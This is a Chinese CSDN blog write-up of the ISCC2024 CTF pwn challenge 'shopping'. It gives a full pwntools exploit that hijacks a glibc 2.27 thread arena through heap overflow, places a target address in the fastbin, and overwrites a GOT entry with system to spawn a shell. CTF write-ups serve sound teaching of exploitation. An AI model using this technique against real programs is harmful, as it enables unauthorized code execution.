[ISCC2024]-PWN:shopping(glibc2.27,劫持线程arena进行任意地址创建堆块)

最新推荐文章于 2024-07-19 11:44:44 发布
最新推荐文章于 2024-07-19 11:44:44 发布
阅读量222 收藏 2
点赞数 10
分类专栏: PWN 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/140130166
版权

查看保护

查看ida

这里有个要注意的点,那就是如果第一次填充堆块没填满,那第二次填充堆块就可以溢出。

完整exp:

from pwn import*
p=process('./shopping18')
system_plt=0x400978

def alloc(size,num,content1=b'',content2=b''):
    p.sendlineafter(b"Action:",b'1')
    p.sendlineafter(b"Item ID:",str(size).encode())
    p.sendlineafter(b"Quantity:",str(num).encode())
    if content1 == b'':
      p.sendlineafter(b"Add gift message? (0/1): ",b'0')
    else:
      p.sendlineafter(b"Add gift message? (0/1): ",b'1')
      p.sendafter(b"Message: ",content1)
      sleep(0.2)
      p.send(content2)


p.sendlineafter(b"Enter the password:",b"I'm ready for shopping")
for i in range(12):
    alloc(0x4000,1000,b'a'*0x4000)
payload=b'a'*0x50+p64(0x200000000)+10*p64(0x60201d)
alloc(0x4000,262,b'a'*0x3FF0,payload)
payload=b'/bin/sh'.ljust(0xB,b'\x00')+p64(system_plt)
alloc(0x60,0,payload.ljust(0x60, b'a'))
p.interactive()

解释一下,刚开始申请1000个0x4000大小的堆块是根据题目能一次申请的最大数量来申请的,这里要注意,一般线程arena是在我们所创建的堆块之前的,所以我们没有办法覆盖,但是在glibc2.27中当我们将堆块都申请完了之后,程序就会在我们的堆块之前再mmap一个线程arena,我们可以劫持这个线程arena。这里的1000个0x4000堆块和下面的262个0x4000堆块都是为了接近线程arena。

然后在达到线程arena之后,维持0x200000000原有数据,在它之后覆盖目标地址。

这样fastbin就会出现目标地址的堆块了。

然后申请出来,将0x602038地址覆盖为system,将rbp+8处覆盖为/bin/sh,就可以getshell了。

clxhzg
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
iscc-cli:国际会议
05-09
iscc-cli-命令行工具 一个基于为数字媒体文件创建ISCC代码的命令行工具。目录背景国际标准内容规范是针对分散式内容标识的的提议。 ISCC代码是根据内容本身通过算法生成的,并提供了许多强大的功能,例如内容相似性...
ISCC-2015-Writeups:这是iscc 2015的文章
05-24
所以,今年又做了一次ISCC,却没有了去年的那种感觉。其实也还好吧,希望ISCC越来越好呗。 其实这份Writeup,去年就想过要写,然后JC先写了,就没写下去。 现在想着,还是留一份给学弟学妹们吧。 加油~~ ##目录...
[ISCC2024]-PWN:chaos解析(堆块满足条件getshell)
2301_79326813的博客
05-04 179
查看保护查看ida这里满足条件就可以getshell了,没什么知识点。
[ISCC2024]-PWN:Flag解析(ret2libc,libcsearcher找libc)
2301_79326813的博客
05-06 161
查看保护查看ida这里的help.txt貌似要一次输入完整,所以没有考虑解出这个。
[ISCC2024]-PWN:easyshell解析(格式化字符串漏洞泄露程序基地址及canary)
2301_79326813的博客
05-04 180
查看保护查看idaflagis那里有可利用的格式化字符串漏洞。
[ISCC2024]-PWN:miao解析(32位系统调用execve来getshell)
2301_79326813的博客
05-21 177
查看保护查看ida这里有格式化字符串漏洞,而且程序遗留了很多可利用的汇编,而且程序给了/bin/sh字符串。所以考虑用系统调用。32位系统调用寄存器传参的顺序是ebx,ecx,edx等,eax用于存储系统调用号。我这里尝试用了orw,但没有成功。
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
parallelized-dc:并行图分区方法,旨在处理基于密度的聚类算法
02-11
这项工作发表在第25届IEEE计算机与通信研讨会(ISCC)上。 YouTube演示文稿链接: : 文章链接: : 数据库 数字书目和图书馆计划(DBLP)数据库被建模为用于支持分析和实验的科学引文网络。 DBLP数据库实例: ://...
ISCC-2015-细节决定成败.rar
09-30
标题“ISCC-2015-细节决定成败.rar”暗示了这个压缩包可能包含的是一个关于2015年国际软件构造大会(ISCC)的资料集,其中的重点是讨论了在软件开发过程中细节的重要性。ISCC是一个专注于软件构造、编程方法、软件工程...
Linux中的环境变量
qhy850716的博客
07-17 538
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
定制 Linux 内核的意义
地球空间
07-17 313
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
最新发布
Starry的博客
07-19 1184
COD 原理,CTRL9,自检(详细代码示例)
Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4296
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 360
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1082
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
Linux】深入探索`cp`命令:文件复制的全面指南
lph159的博客
07-18 369
cp命令用于复制文件或目录的内容。cp [选项] 源文件 目标文件或目录使用cp命令可以在文件系统中创建新的副本,无论是单个文件还是整个目录树。接下来我们将详细介绍cp命令的各个选项及其用法。
Linux】文件管理常用命令【超详细】
2301_82023330的博客
07-16 750
这篇博客介绍了Linux系统中的常用文件管理命令,包括`ls`、`cd`、`cp`、`mv`、`rm`和`mkdir`等。通过这些命令,用户可以高效地浏览目录、复制和移动文件、删除文件以及创建新目录。文章详细讲解了每个命令的基本用法和常见选项,并通过实例演示了这些命令在实际操作中的应用,帮助读者掌握文件管理的基本技能,提升Linux系统的使用效率。
Linux HOOK机制与Netfilter HOOK
Flashing-C的博客
07-18 756
在计算机中基本所有的软件程序都可以通过hook方式进行行为拦截,hook方式就是改变原始的执行流。 Linux常见的HOOK方式:1、修改函数指针。2、用户态动态库拦截。①利用环境变量LD_PRELOAD和预装载机制进行HOOK;②利用函数ptrace可实现对已运行的程序进行HOOK;3、内核态系统调用拦截。通过修改全局系统调用表,对系统调用进行劫持;4、堆栈式文件系统拦截。5、LSM。6、Netfilter HOOK。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值